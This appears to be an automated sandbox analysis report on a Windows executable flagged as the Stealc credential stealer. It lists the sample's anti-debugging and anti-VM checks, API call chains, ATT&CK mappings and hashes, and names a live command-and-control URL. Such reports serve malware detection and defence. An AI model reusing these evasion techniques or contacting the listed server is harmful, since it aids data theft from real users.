                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10FBB7B second address: 10FBB81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110B90B second address: 110B924 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB4752107FCh 0x00000007 pushad 0x00000008 jnl 00007FB4752107F6h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110B213 second address: 110B217 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110E4DE second address: 110E4E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 111159F second address: 11115CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB47527219Fh 0x00000009 popad 0x0000000a jp 00007FB4752721ACh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54103D0 second address: 54103EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB475210808h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54103EC second address: 5410425 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB47527219Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FB4752721A6h 0x0000000f push eax 0x00000010 jmp 00007FB47527219Bh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410425 second address: 541042B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 541042B second address: 5410449 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FB4752721A8h 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54104CC second address: 54104D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54104D2 second address: 5410550 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB47527219Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FB47527219Fh 0x00000013 add ax, BFFEh 0x00000018 jmp 00007FB4752721A9h 0x0000001d popfd 0x0000001e mov ax, BC47h 0x00000022 popad 0x00000023 xchg eax, ebp 0x00000024 jmp 00007FB47527219Ah 0x00000029 mov ebp, esp 0x0000002b jmp 00007FB4752721A0h 0x00000030 pop ebp 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FB4752721A7h 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410550 second address: 5410568 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB475210804h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410568 second address: 541056C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1030B0F second address: 1030B13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1030CD4 second address: 1030CF9 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB475272196h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB4752721A8h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1030CF9 second address: 1030CFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: E8D9DC instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 10275EC instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 10B143D instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-39110
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB40F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00BB40F0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BAE530 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00BAE530
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BAF7B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BAF7B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB47C0 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00BB47C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BA1710 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BA1710
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BADB80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00BADB80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB3B00 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00BB3B00
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB4B60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BB4B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BAEE20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00BAEE20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BABE40 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00BABE40
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BADF10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00BADF10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BA1160 GetSystemInfo,ExitProcess,0_2_00BA1160
                Source: file.exe, file.exe, 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2176326944.0000000001365000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2176326944.0000000001333000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2176326944.00000000012EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: file.exe, 00000000.00000002.2176326944.0000000001365000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWA
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37925
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37922
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37810
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37937
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37945
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-37977
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BA4610 VirtualProtect ?,00000004,00000100,000000000_2_00BA4610
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB9BB0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00BB9BB0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB9AA0 mov eax, dword ptr fs:[00000030h]0_2_00BB9AA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB7690 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA,0_2_00BB7690
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6644, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB9790 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00BB9790
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB98E0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,CloseHandle,0_2_00BB98E0
                Source: file.exe, file.exe, 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: QProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BE75A8 cpuid 0_2_00BE75A8
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00BB7D20
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB6BC0 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00BB6BC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB79E0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00BB79E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00BB7BC0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00BB7BC0

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.ba0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2131533461.00000000052D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2176326944.00000000012EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6644, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.ba0000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2131533461.00000000052D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2176326944.00000000012EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 6644, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts12
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem334
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://docs.rs/getrandom#nodejs-es-module-support0%URL Reputationsafe

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.206/6c4adf523b719729.phptrue
                  		unknown
                  http://185.215.113.206/true
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.206/6c4adf523b719729.php/2file.exe, 00000000.00000002.2176326944.0000000001355000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://185.215.113.206/6c4adf523b719729.php3file.exe, 00000000.00000002.2176326944.000000000134A000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://185.215.113.206/6c4adf523b719729.php.file.exe, 00000000.00000002.2176326944.00000000012EE000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://185.215.113.206/6c4adf523b719729.php/file.exe, 00000000.00000002.2176326944.0000000001355000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://185.215.113.206/:Ufile.exe, 00000000.00000002.2176326944.00000000012EE000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://185.215.113.206file.exe, 00000000.00000002.2176326944.00000000012EE000.00000004.00000020.00020000.00000000.sdmptrue
                                		unknown
                                https://docs.rs/getrandom#nodejs-es-module-supportfile.exe, file.exe, 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2131533461.00000000052FB000.00000004.00001000.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown

                                World Map of Contacted IPs

                                • No. of IPs < 25%
                                • 25% < No. of IPs < 50%
                                • 50% < No. of IPs < 75%
                                • 75% < No. of IPs

                                Public IPs

                                IPDomainCountryFlagASNASN NameMalicious
                                185.215.113.206
                                		unknownPortugal
                                		206894WHOLESALECONNECTIONSNLtrue

                                General Information

                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1544952
                                Start date and time:2024-10-29 22:12:12 +01:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 3m 23s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                Number of analysed new started processes analysed:2
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:file.exe
                                Detection:MAL
                                Classification:mal100.troj.evad.winEXE@1/0@0/1
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 80%
                                • Number of executed functions: 19
                                • Number of non-executed functions: 127
                                Cookbook Comments:
                                • Found application associated with file extension: .exe
                                • Stop behavior analysis, all processes terminated

                                Warnings

                                • Exclude process from analysis (whitelisted): dllhost.exe
                                • Excluded domains from analysis (whitelisted): otelrules.azureedge.net
                                • Report size getting too big, too many NtQueryValueKey calls found.
                                • VT rate limit hit for: file.exe

                                Simulations

                                Behavior and APIs

                                No simulations

                                Joe Sandbox View / Context

                                IPs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                185.215.113.206file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.206/6c4adf523b719729.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206/6c4adf523b719729.php
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.206/6c4adf523b719729.php
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.206/6c4adf523b719729.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206/
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206/6c4adf523b719729.php
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.206/6c4adf523b719729.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206/6c4adf523b719729.php
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.206/6c4adf523b719729.php
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206/6c4adf523b719729.php

                                Domains

                                No context

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                • 185.215.113.16
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.206
                                file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                • 185.215.113.16
                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, StealcBrowse
                                • 185.215.113.16
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.206
                                file.exeGet hashmaliciousStealc, VidarBrowse
                                • 185.215.113.206
                                file.exeGet hashmaliciousLummaCBrowse
                                • 185.215.113.16
                                file.exeGet hashmaliciousLummaCBrowse
                                • 185.215.113.16
                                file.exeGet hashmaliciousStealcBrowse
                                • 185.215.113.206

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                No created / dropped files found

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):7.960426913773684
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:file.exe
                                File size:2'094'592 bytes
                                MD5:31c844530d857c4266248543c40284cc
                                SHA1:97f7aae6867695e025abdc5e1a7d446d7c5b875f
                                SHA256:81ccbbfcfd5e8991632a16d6b4d28b36ef74409773b3e5622cf58cf43638ce07
                                SHA512:8ea1e7b81251c07032a4d78eff745f316e7b9a28ca3e003de63ed4190589d85f8f25ae512e0f4f95b5388d92ed38da954c517b996c381f51c237a437123a482f
                                SSDEEP:49152:/nNForSjuTyy880u4Ld2ZxkryOFAMsfcCNxvBdVl46Pu:/nNCrSjUvUuxEAMBSrVP
                                TLSH:04A533F31C2644F1DC9549779DE30960A06DB9A2AF2DBF2E322F9620581F8C25B2D5F4
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........b.}.............u^......uk......u_......{v.....fz./.....{f..............uZ......uh.....Rich....................PE..L...8n.g...

                                File Icon

                                Icon Hash:00928e8e8686b000

                                Static PE Info

                                General

                                Entrypoint:0xb13000
                                Entrypoint Section:.taggant
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                Time Stamp:0x671E6E38 [Sun Oct 27 16:45:44 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:1
                                File Version Major:5
                                File Version Minor:1
                                Subsystem Version Major:5
                                Subsystem Version Minor:1
                                Import Hash:2eabe9054cad5152567f0699947a2c5b

                                Entrypoint Preview

                                Instruction
                                jmp 00007FB4750BBD9Ah
                                paddq mm3, qword ptr [edi]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add cl, ch
                                add byte ptr [eax], ah
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [esi], al
                                add byte ptr [eax], 00000000h
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                adc byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add al, 0Ah
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                xor byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                and al, 00h
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                and dword ptr [eax], eax
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                push es
                                or al, byte ptr [eax]
                                add byte ptr [edx], al
                                or al, byte ptr [eax]
                                add byte ptr [edx+ecx], al
                                add byte ptr [eax], al
                                add ecx, dword ptr [edx]
                                add byte ptr [eax], al
                                add dword ptr [edx], ecx
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al

                                Rich Headers

                                Programming Language:
